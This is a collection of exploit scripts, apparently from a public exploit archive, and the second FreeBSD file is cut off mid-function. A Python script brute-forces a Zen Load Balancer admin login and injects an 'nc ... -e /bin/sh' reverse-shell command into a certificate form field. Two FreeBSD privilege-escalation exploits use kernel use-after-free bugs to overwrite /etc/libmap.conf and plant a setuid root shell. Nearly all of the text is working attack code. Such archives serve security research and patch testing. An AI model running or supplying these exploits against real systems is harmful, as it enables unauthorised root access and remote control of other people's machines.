# 28.03.2020 @ 22:41
#
# by cody sixteen
#
import base64
import sys, re
import requests
import ssl
from functools import partial
ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
# disable ssl warnings:
import urllib3
urllib3.disable_warnings()
from requests.auth import HTTPBasicAuth
#
target = sys.argv[1]
username = 'admin'
password = 'P@ssw0rd'
def main():
print 'zenload3r.py - zen load balancer pwn3r'
print ' zenload3r.py - vs - %s' % ( target )
print ''
print '[+] checking if host is alive...'
global sess
sess = requests.session()
global baseUrl
baseUrl = target + ':444/index.cgi'
checkBaseUrl = sess.get(baseUrl, verify=False)
checkBaseResp = checkBaseUrl.status_code
#print checkBaseResp
if checkBaseResp == 401:
print '[i] ...it is. we need to log in to proceed'
logmein(baseUrl)
def logmein(target):
print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)
#pwd_file = '/usr/share/wordlists/dirb/common.txt'
pwd_file = 'passwd.lst'
try:
read_pwds = open(pwd_file, 'r')
pwds = read_pwds.readlines()
for pwd in pwds:
pwd = pwd.rstrip()
logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
logmeresp = logme.text
#print logmeresp
if '<p>Hello <strong>admin</strong>' in logmeresp:
print '[+] admin user logged-in! :D'
print '[+] working password: %s' % ( pwd )
load3r(baseUrl, pwd)
except requests.exceptions.ConnectionError:
print '[-] Can not connect to remote host :C\n'
def load3r(baseUrl, pwd):
print '[+] time to get reverse shell, preparing...'
creds = base64.b64encode("{}:{}".format(username,pwd))
creds2 = creds.rstrip()
print 'creds: ', creds2
baseUrl = "https://192.168.1.200:444/index.cgi"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444",
"Authorization": "Basic {}".format(creds2), "Connection": "close",
"Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1"
}
sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel",
"cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe",
"cert_organization": sh,
"cert_locality": "qweqweqwe", "cert_state": "qweqweqwe",
"cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com",
"cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}
requests.post(baseUrl, headers=headers, data=reqdata,verify=False)
print '[*] got r00t? ;>\n'
# run me:
if __name__ == '__main__':
main()

677
exploits/freebsd/local/47829.sh Executable file
View file

@ -0,0 +1,677 @@
# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation
# Date: 2019-12-30
# Author: Karsten König of Secfault Security
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
# CVE: CVE-2019-5596
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
#!/bin/sh
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c << EOF
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <pthread_np.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/cpuset.h>
#include <sys/event.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/sysctl.h>
#include <sys/types.h>
#include <sys/un.h>
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_FORKS 3
#define FILE_SIZE 1024
#define CHUNK_SIZE 1
#define N_FILES 25
#define SERVER_PATH "/tmp/sync_forks"
#define DEFAULT_PATH "/tmp/pwn"
#define HAMMER_PATH "/tmp/pwn2"
#define ATTACK_PATH "/etc/libmap.conf"
#define HOOK_LIB "libutil.so.9"
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
#define CORE_0 0
#define CORE_1 1
#define MAX_TRIES 500
struct thread_data {
int fd;
int fd2;
};
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
int send_recv(int fd, int sv[2], int n_fds) {
int ret, i;
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmh;
char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
int *fds; char buf[1];
iov.iov_base = "a";
iov.iov_len = 1;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmsg;
msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
msg.msg_flags = 0;
cmh = CMSG_FIRSTHDR(&msg);
cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
cmh->cmsg_level = SOL_SOCKET;
cmh->cmsg_type = SCM_RIGHTS;
fds = (int *)CMSG_DATA(cmsg);
for (i = 0; i < n_fds; i++) {
fds[i] = fd;
}
ret = sendmsg(sv[0], &msg, 0);
if (ret == -1) {
return 1;
}
iov.iov_base = buf;
msg.msg_name = NULL;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmh;
msg.msg_controllen = CMSG_SPACE(0);
msg.msg_flags = 0;
ret = recvmsg(sv[1], &msg, 0);
if (ret == -1) {
return 1;
}
return 0;
}
int open_tmp(char *path)
{
int fd;
char *real_path;
if (path != NULL) {
real_path = malloc(strlen(path) + 1);
strcpy(real_path, path);
}
else {
real_path = malloc(strlen(DEFAULT_PATH) + 1);
strcpy(real_path, DEFAULT_PATH);
}
if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
perror("[!] open");
exit(1);
}
fchmod(fd, 0700);
return fd;
}
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
bzero(remote, sizeof(struct sockaddr_un));
remote->sun_family = AF_UNIX;
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
}
int bind_domain_socket(struct sockaddr_un *remote) {
int server_socket;
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
if (bind(server_socket,
(struct sockaddr *) remote,
sizeof(struct sockaddr_un)) != 0) {
perror("[!] bind");
exit(1);
}
return server_socket;
}
int connect_domain_socket_client() {
int client_socket;
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
return client_socket;
}
// Prevent panic at termination because f_count of the
// corrupted struct file is 0 at the moment this function
// is used but fd2 still points to the struct, hence fdrop()
// is called at exit and will panic because f_count will
// be below 0
//
// So we just use our known primitive to increase f_count
void prevent_panic(int sv[2], int fd)
{
send_recv(fd, sv, 0xfe);
}
int stick_thread_to_core(int core) {
/* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
/* if (core_id < 0 || core_id >= num_cores) */
/* return EINVAL; */
cpuset_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
pthread_t current_thread = pthread_self();
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
}
void *trigger_uaf(void *thread_args) {
struct thread_data *thread_data;
int fd, fd2;
if (stick_thread_to_core(CORE_0) != 0) {
perror("[!] [!] trigger_uaf: Could not stick thread to core");
}
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = thread_data->fd2;
printf("[+] trigger_uaf: fd: %d\n", fd);
printf("[+] trigger_uaf: fd2: %d\n", fd2);
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
pthread_mutex_lock(&trigger_mtx);
pthread_cond_wait(&trigger_cond, &trigger_mtx);
usleep(40);
// Close to fds to trigger uaf
//
// This assumes that fget_write() in kern_writev()
// was already successful!
//
// Otherwise kernel panic is triggered
//
// refcount = 2 (primitive+fget_write)
close(fd);
close(fd2);
// refcount = 0 => free
fd = open(ATTACK_PATH, O_RDONLY);
// refcount = 1
printf("[+] trigger_uaf: Opened read-only file, now hope\n");
printf("[+] trigger_uaf: Exit\n");
pthread_exit(NULL);
}
void *hammer(void *arg) {
int i, j, k, client_socket, ret;
char buf[FILE_SIZE], sync_buf[3];
FILE *fd[N_FILES];
struct sockaddr_un remote;
prepare_domain_socket(&remote, SERVER_PATH);
client_socket = connect_domain_socket_client();
strncpy(sync_buf, "1\n", 3);
for (i = 0; i < N_FILES; i++) {
unlink(HAMMER_PATH);
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
perror("[!] fopen");
exit(1);
}
}
for (i = 0; i < FILE_SIZE; i++) {
buf[i] = 'a';
}
pthread_mutex_lock(&hammer_mtx);
// Sometimes sendto() fails because
// no free buffer is available
for (;;) {
if (sendto(client_socket,
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &remote,
sizeof(remote)) != -1) {
break;
}
}
pthread_cond_wait(&hammer_cond, &hammer_mtx);
pthread_mutex_unlock(&hammer_mtx);
for (i = 0; i < N; i++) {
for (k = 0; k < N_FILES; k++) {
rewind(fd[k]);
}
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
for (k = 0; k < N_FILES; k++) {
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
perror("[!] fwrite");
exit(1);
}
}
fflush(NULL);
}
}
pthread_exit(NULL);
}
// Works on UFS only
void *monitor_dirty_buffers(void *arg) {
int hidirtybuffers, numdirtybuffers;
size_t len;
len = sizeof(int);
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
perror("[!] sysctlbyname hidirtybuffers");
exit(1);
};
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
while(1) {
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
if (numdirtybuffers >= hidirtybuffers) {
pthread_cond_signal(&write_cond);
pthread_cond_signal(&trigger_cond);
printf("[+] monitor: Reached hidirtybuffers watermark\n");
break;
}
}
pthread_exit(NULL);
}
int check_write(int fd) {
char buf[256];
int nbytes;
struct stat st;
printf("[+] check_write\n");
stat(DEFAULT_PATH, &st);
printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
stat(ATTACK_PATH, &st);
printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
nbytes = read(fd, buf, strlen(HOOK_LIB));
printf("[+] Read bytes: %d\n", nbytes);
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
return 1;
}
else if (nbytes < 0) {
perror("[!] check_write:read");
printf("[!] check_write:Cannot check if it worked!");
return 1;
}
return 0;
}
void *write_to_file(void *thread_args) {
int fd, fd2, nbytes;
int *fd_ptr;
char buf[256];
struct thread_data *thread_data;
if (stick_thread_to_core(CORE_1) != 0) {
perror("[!] write_to_file: Could not stick thread to core");
}
fd_ptr = (int *) malloc(sizeof(int));
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = open(ATTACK_PATH, O_RDONLY);
printf("[+] write_to_file: Wait for signal from monitor\n");
pthread_mutex_lock(&write_mtx);
pthread_cond_wait(&write_cond, &write_mtx);
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
nbytes = write(fd, buf, strlen(buf));
// Reopen directly after write to prevent panic later
//
// After the write f_count == 0 because after trigger_uaf()
// opened the read-only file, f_count == 1 and write()
// calls fdrop() at the end
//
// => f_count == 0
//
// A direct open hopefully assigns the now again free file
// object to fd so that we can prevent the panic with our
// increment primitive.
if ((fd = open_tmp(NULL)) == -1)
perror("[!] write_to_file: open_tmp");
*fd_ptr = fd;
if (nbytes < 0) {
perror("[!] [!] write_to_file:write");
} else if (nbytes > 0) {
printf("[+] write_to_file: We have written something...\n");
if (check_write(fd2) > 0)
printf("[+] write_to_file: It (probably) worked!\n");
else
printf("[!] write_to_file: It worked not :(\n");
}
printf("[+] write_to_file: Exit\n");
pthread_exit(fd_ptr);
}
void prepare(int sv[2], int fds[2]) {
int fd, fd2, i;
printf("[+] Start UaF preparation\n");
printf("[+] This can take a while\n");
// Get a single file descriptor to send via the socket
if ((fd = open_tmp(NULL)) == -1) {
perror("[!] open_tmp");
exit(1);
}
if ((fd2 = dup(fd)) == -1) {
perror("[!] dup");
exit(1);
}
// fp->f_count will increment by 0xfe in one iteration
// doing this 16909320 times will lead to
// f_count = 16909320 * 0xfe + 2 = 0xfffffff2
// Note the 2 because of the former call of dup() and
// the first open().
//
// To test our trigger we can send 0xd more fd's what
// would to an f_count of 0 when fdclose() is called in
// m_dispose_extcontrolm. fdrop() will reduce f_count to
// 0xffffffff = -1 and ultimately panic when _fdrop() is
// called because the latter asserts that f_count is 0.
// _fdrop is called in the first place because
// refcount_release() only checks that f_count is less or
// equal 1 to recognize the last reference.
//
// If we want to trigger the free without panic, we have
// to send 0xf fds and close an own what will lead to an
// fdrop() call without panic as f_count is 1 and reduced
// to 0 by close(). The unclosed descriptor references now
// a free 'struct file'.
for (i = 0; i < 16909320; i++) {
if (i % 1690930 == 0) {
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
}
if (send_recv(fd, sv, N_FDS)) {
perror("[!] prepare:send_recv");
exit(1);
}
}
if (send_recv(fd, sv, 0xf)) {
perror("[!] prepare:send_recv");
exit(1);
}
fds[0] = fd;
fds[1] = fd2;
printf("[+] Finished UaF preparation\n");
}
void read_thread_status(int server_socket) {
int bytes_rec, count;
struct sockaddr_un client;
socklen_t len;
char buf[256];
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
setsockopt(server_socket,
SOL_SOCKET, SO_RCVTIMEO,
(const char*)&tv, sizeof tv);
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
if (count % 100 == 0) {
printf("[+] Hammer threads ready: %d\n", count);
}
bzero(&client, sizeof(struct sockaddr_un));
bzero(buf, 256);
len = sizeof(struct sockaddr_un);
if ((bytes_rec = recvfrom(server_socket,
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] recvfrom");
break;
}
}
if (count != NUM_FORKS * NUM_THREADS) {
printf("[!] Could not create all hammer threads, will try though!\n");
}
}
void fire() {
int i, j, fd, fd2, bytes_rec, server_socket;
int sv[2], fds[2], hammer_socket[NUM_FORKS];
int *fd_ptr;
char socket_path[256], sync_buf[3], buf[256];
pthread_t write_thread, trigger_thread, monitor_thread;
pthread_t hammer_threads[NUM_THREADS];
pid_t pids[NUM_FORKS];
socklen_t len;
struct thread_data thread_data;
struct sockaddr_un server, client;
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
// Socket for receiving thread status
unlink(SERVER_PATH);
prepare_domain_socket(&server, SERVER_PATH);
server_socket = bind_domain_socket(&server);
// Sockets to receive hammer signal
for (i = 0; i < NUM_FORKS; i++) {
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
unlink(socket_path);
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
}
strncpy(sync_buf, "1\n", 3);
len = sizeof(struct sockaddr_un);
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
perror("[!] socketpair");
exit(1);
}
pthread_mutex_init(&write_mtx, NULL);
pthread_mutex_init(&trigger_mtx, NULL);
pthread_cond_init(&write_cond, NULL);
pthread_cond_init(&trigger_cond, NULL);
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
prepare(sv, fds);
fd = fds[0];
fd2 = fds[1];
thread_data.fd = fd;
thread_data.fd2 = fd2;
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
for (j = 0; j < NUM_FORKS; j++) {
if ((pids[j] = fork()) < 0) {
perror("[!] fork");
abort();
}
else if (pids[j] == 0) {
pthread_mutex_init(&hammer_mtx, NULL);
pthread_cond_init(&hammer_cond, NULL);
close(fd);
close(fd2);
/* Prevent that a file stream in the hammer threads
* gets the file descriptor of fd for debugging purposes
*/
if ((fd = open_tmp("/tmp/dummy")) == -1)
perror("[!] dummy");
if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
perror("[!] dummy2");
printf("[+] Fork %d fd: %d\n", j, fd);
printf("[+] Fork %d fd2: %d\n", j, fd2);
for (i = 0; i < NUM_THREADS; i++) {
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
}
printf("[+] Fork %d created all threads\n", j);
if ((bytes_rec = recvfrom(hammer_socket[j],
buf, 256, 0,
(struct sockaddr *) &client,
&len)) == -1) {
perror("[!] accept");
abort();
}
pthread_cond_broadcast(&hammer_cond);
for (i = 0; i < NUM_THREADS; i++) {
pthread_join(hammer_threads[i], NULL);
}
pthread_cond_destroy(&hammer_cond);
pthread_mutex_destroy(&hammer_mtx);
exit(0);
} else {
printf("[+] Created child with PID %d\n", pids[j]);
}
}
read_thread_status(server_socket);
printf("[+] Send signal to Start Hammering\n");
for (i = 0; i < NUM_FORKS; i++) {
if (sendto(hammer_socket[i],
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &hammer_socket_addr[i],
sizeof(hammer_socket_addr[0])) == -1) {
perror("[!] sendto");
exit(1);
}
}
pthread_join(monitor_thread, NULL);
for (i = 0; i < NUM_FORKS; i++) {
kill(pids[i], SIGKILL);
printf("[+] Killed %d\n", pids[i]);
}
pthread_join(write_thread, (void **) &fd_ptr);
pthread_join(trigger_thread, NULL);
pthread_mutex_destroy(&write_mtx);
pthread_mutex_destroy(&trigger_mtx);
pthread_cond_destroy(&write_cond);
pthread_cond_destroy(&trigger_cond);
printf("[+] Returned fd: %d\n", *fd_ptr);
prevent_panic(sv, *fd_ptr);
// fd was acquired from write_to_file
// which allocs a pointer for it
free(fd_ptr);
}
int main(int argc, char **argv)
{
setbuf(stdout, NULL);
fire();
return 0;
}
EOF
cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c
cat > program.c << EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
if (!geteuid())
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
}
EOF
cc -o program.o -c program.c -fPIC
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
echo "[+] Firing the Heavy Cyber Weapon"
./heavy_cyber_weapon
su
if [ -f /tmp/xxxx ]; then
echo "[+] Enjoy!"
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
/tmp/xxxx
else
echo "[!] FAIL"
fi

754
exploits/freebsd/local/47830.sh Executable file
View file

@ -0,0 +1,754 @@
# Exploit: FreeBSD-SA-19:15.mqueuefs - Privilege Escalation
# Author: Karsten König of Secfault Security
# Date: 2019-12-30
# Change line 719 to choose which vulnerability
# is targeted
#
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
# Exploit for FreeBSD-SA-19:15.mqueuefs and
# FreeBSD-SA-19:24.mqueu
#!/bin/sh
echo "[+] Root Exploit for FreeBSD mqueuefs vulnerabilities"
umask 0000
# libmap.conf has to exist because it is
# the attacked file
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
# Make a backup of the current libmap.conf
# because it has to be reconstructed afterwards
cp /etc/libmap.conf ./
# Write the exploit to a C file
cat > exploit.c << EOF
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <pthread_np.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/cpuset.h>
#include <sys/event.h>
#include <sys/ioctl.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/sysctl.h>
#include <sys/_types.h>
#include <sys/types.h>
#include <sys/un.h>
#define N_OPEN 0x2
// Tweak NUM_THREADS and NUM_FORKS if
// more RAM is available on the target
//
// These parameters were tested with
// up to 16 GB of RAM on a dual-core
// Intel based system
#define N 1000000
#define NUM_THREADS 600
#define NUM_FORKS 3
#define FILE_SIZE 1024
#define CHUNK_SIZE 1
#define N_FILES 25
// These are temporary files
// which are created during
// exploitation
#define SERVER_PATH "/tmp/sync_forks"
#define DEFAULT_PATH "/tmp/pwn"
#define HAMMER_PATH "/tmp/pwn2"
// This is the attacked file
#define ATTACK_PATH "/etc/libmap.conf"
// These are parameters from the attack script
#define HOOK_LIB "libutil.so.9"
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
// The exploit will stick some threads
// to specific cores
#define CORE_0 0
#define CORE_1 1
// Syscalls from mqueuefs
#define KMQ_OPEN 457
#define KMQ_TIMEDSEND 460
// Taken from sys/mqueue.h
struct mq_attr {
long mq_flags;
long mq_maxmsg;
long mq_msgsize;
long mq_curmsgs;
long __reserved[4];
};
struct thread_data {
int fd;
int fd2;
};
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
// Both syscalls are indirectly called to be less reliable on
// installed libraries
int mq_open(const char *name, int oflag, mode_t mode,
const struct mq_attr *attr)
{
int fd;
fd = syscall(KMQ_OPEN, name, oflag, mode, attr);
return fd;
}
void mq_timedsend(int fd, char *buf, size_t len,
unsigned prio, const struct timespec *timeout)
{
syscall(KMQ_TIMEDSEND, fd, buf, len, prio, timeout);
}
// Convenience function to open temporary files
int open_tmp(char *path)
{
int fd;
char *real_path;
if (path != NULL) {
real_path = malloc(strlen(path) + 1);
strcpy(real_path, path);
}
else {
real_path = malloc(strlen(DEFAULT_PATH) + 1);
strcpy(real_path, DEFAULT_PATH);
}
if ((fd = open(real_path, O_RDWR | O_CREAT, S_IRWXU)) == -1) {
perror("[!] open");
}
return fd;
}
// Convenience function to prepare a UNIX domain socket
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
bzero(remote, sizeof(struct sockaddr_un));
remote->sun_family = AF_UNIX;
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
}
// Convenience function to bind a UNIX domain socket
int bind_domain_socket(struct sockaddr_un *remote) {
int server_socket;
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
if (bind(server_socket,
(struct sockaddr *) remote,
sizeof(struct sockaddr_un)) != 0) {
perror("[!] bind");
exit(1);
}
return server_socket;
}
// Convenience function to connect to a UNIX domain socket
int connect_domain_socket_client() {
int client_socket;
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
perror("[!] socket");
exit(1);
}
return client_socket;
}
// Prevent panic at termination because f_count of the
// corrupted struct file is 0 at the moment this function
// is called but open file descriptors still points to the struct,
// hence fdrop() is called at exit of the program and will raise a
// kernel panic because f_count will be below 0
//
// So we just use our known primitive to increase f_count
void prevent_panic(int fd)
{
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
mq_timedsend(fd, NULL, 0, 0, (const struct timespec *)0x1);
}
// Convenience function to stick a thread to a CPU core
int stick_thread_to_core(int core) {
cpuset_t cpuset;
CPU_ZERO(&cpuset);
CPU_SET(core, &cpuset);
pthread_t current_thread = pthread_self();
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
}
// This function will trigger the use-after-free
void *trigger_uaf(void *thread_args) {
struct thread_data *thread_data;
int fd, fd2;
if (stick_thread_to_core(CORE_0) != 0) {
perror("[!] [!] trigger_uaf: Could not stick thread to core");
}
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = thread_data->fd2;
printf("[+] trigger_uaf: fd: %d\n", fd);
printf("[+] trigger_uaf: fd2: %d\n", fd2);
// The thread has to wait for the preparation of the
// race condition
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
pthread_mutex_lock(&trigger_mtx);
pthread_cond_wait(&trigger_cond, &trigger_mtx);
// This sleep parameter helps to render
// the exploit more reliable
//
// Tweeking may be needed for the target system
usleep(40);
// Close two fds to trigger UaF
//
// This assumes that fget_write() in kern_writev()
// was already successful!
//
// Otherwise kernel panic is triggered
//
// f_count = 2 (primitive+fget_write)
close(fd);
close(fd2);
// f_count = 0 => free
fd = open(ATTACK_PATH, O_RDONLY);
// refcount = 1
// all fds do now point to the attacked path
printf("[+] trigger_uaf: Opened read-only file\n");
printf("[+] trigger_uaf: Exit\n");
pthread_exit(NULL);
}
// This function will write to many invalid file streams
//
// This will eventually increase the number of dirty buffers
// in the kernel and creates an exploitable race condition
// for the Use-after-Free
void *hammer(void *arg) {
int i, j, k, client_socket;
char buf[FILE_SIZE], sync_buf[3];
FILE *fd[N_FILES];
struct sockaddr_un remote;
prepare_domain_socket(&remote, SERVER_PATH);
client_socket = connect_domain_socket_client();
strncpy(sync_buf, "1\n", 3);
// Open many files and unlink them directly
// to render the file stream invalid
for (i = 0; i < N_FILES; i++) {
unlink(HAMMER_PATH);
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
perror("[!] fopen");
exit(1);
}
}
for (i = 0; i < FILE_SIZE; i++) {
buf[i] = 'a';
}
pthread_mutex_lock(&hammer_mtx);
// Signal that the thread is prepared
//
// Sometimes sendto() fails because
// no free buffer is available
for (;;) {
if (sendto(client_socket,
sync_buf,
strlen(sync_buf), 0,
(struct sockaddr *) &remote,
sizeof(remote)) != -1) {
break;
}
}
// Wait for the other hammer threads
pthread_cond_wait(&hammer_cond, &hammer_mtx);
pthread_mutex_unlock(&hammer_mtx);
// Write to the file streams to create many dirty buffers
for (i = 0; i < N; i++) {
for (k = 0; k < N_FILES; k++) {
rewind(fd[k]);
}
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
for (k = 0; k < N_FILES; k++) {
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
perror("[!] fwrite");
exit(1);
}
}
fflush(NULL);
}
}
pthread_exit(NULL);
}
// This function monitors the number of
// dirty buffers.
//
// If enough dirty buffers do exist, a
// signal to the write and Use-after-Free
// trigger thread is signalled to
// execute the actual attack
//
// Works on UFS only
void *monitor_dirty_buffers(void *arg) {
int hidirtybuffers, numdirtybuffers;
size_t len;
len = sizeof(int);
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
perror("[!] sysctlbyname hidirtybuffers");
exit(1);
};
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
while(1) {
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
if (numdirtybuffers >= hidirtybuffers) {
pthread_cond_signal(&write_cond);
pthread_cond_signal(&trigger_cond);
printf("[+] monitor: Reached hidirtybuffers watermark\n");
break;
}
}
pthread_exit(NULL);
}
// Check if the write to the attacked
// path was successful
int check_write(int fd) {
char buf[256];
int nbytes;
struct stat st;
printf("[+] check_write\n");
stat(DEFAULT_PATH, &st);
printf("[+] %s size: %lld\n", DEFAULT_PATH, st.st_size);
stat(ATTACK_PATH, &st);
printf("[+] %s size: %lld\n", ATTACK_PATH, st.st_size);
nbytes = read(fd, buf, strlen(HOOK_LIB));
printf("[+] Read bytes: %d\n", nbytes);
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
return 1;
}
else if (nbytes < 0) {
perror("[!] check_write:read");
printf("[!] check_write:Cannot check if it worked!");
return 1;
}
return 0;
}
// This function will execute the write operation
// to the attacked path
void *write_to_file(void *thread_args) {
int fd, fd2, nbytes;
int *fd_ptr;
char buf[256];
struct thread_data *thread_data;
struct mq_attr attrs;
if (stick_thread_to_core(CORE_1) != 0) {
perror("[!] write_to_file: Could not stick thread to core");
}
fd_ptr = malloc(sizeof(int));
attrs.mq_maxmsg = 10;
attrs.mq_msgsize = sizeof(int);
thread_data = (struct thread_data *)thread_args;
fd = thread_data->fd;
fd2 = open(ATTACK_PATH, O_RDONLY);
// Wait for the signal to execute the write operation
printf("[+] write_to_file: Wait for signal from monitor\n");
pthread_mutex_lock(&write_mtx);
pthread_cond_wait(&write_cond, &write_mtx);
// Write to the temporary file
//
// During the write operation the exploit will trigger
// the Use-after-Free and exchange the written file
// with the attacked file to render a write to it
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
nbytes = write(fd, buf, strlen(buf));
// Reopen directly after write to prevent panic later
//
// After the write f_count == 0 because after trigger_uaf()
// opened the read-only file, f_count == 1 and write()
// calls fdrop() at the end
//
// => f_count == 0
//
// A direct open hopefully assigns the now again free file
// object to fd so that we can prevent the panic with our
// increment primitive.
*fd_ptr = mq_open("/pwn_mq", O_RDWR | O_CREAT, 0666, &attrs);
if (*fd_ptr == -1)
perror("[!] write_to_file: mq_open");
if (nbytes < 0) {
perror("[!] write_to_file: write");
} else if (nbytes > 0) {
printf("[+] write_to_file: We have written something...\n");
if (check_write(fd2) > 0)
printf("[+] write_to_file: It (probably) worked!\n");
else
printf("[!] write_to_file: It worked not :(\n");
}
printf("[+] write_to_file: Exit\n");
pthread_exit(fd_ptr);
}
// This function prepares the Use-after-Free due to
// a reference counter overflow
void prepare(int fds[3]) {
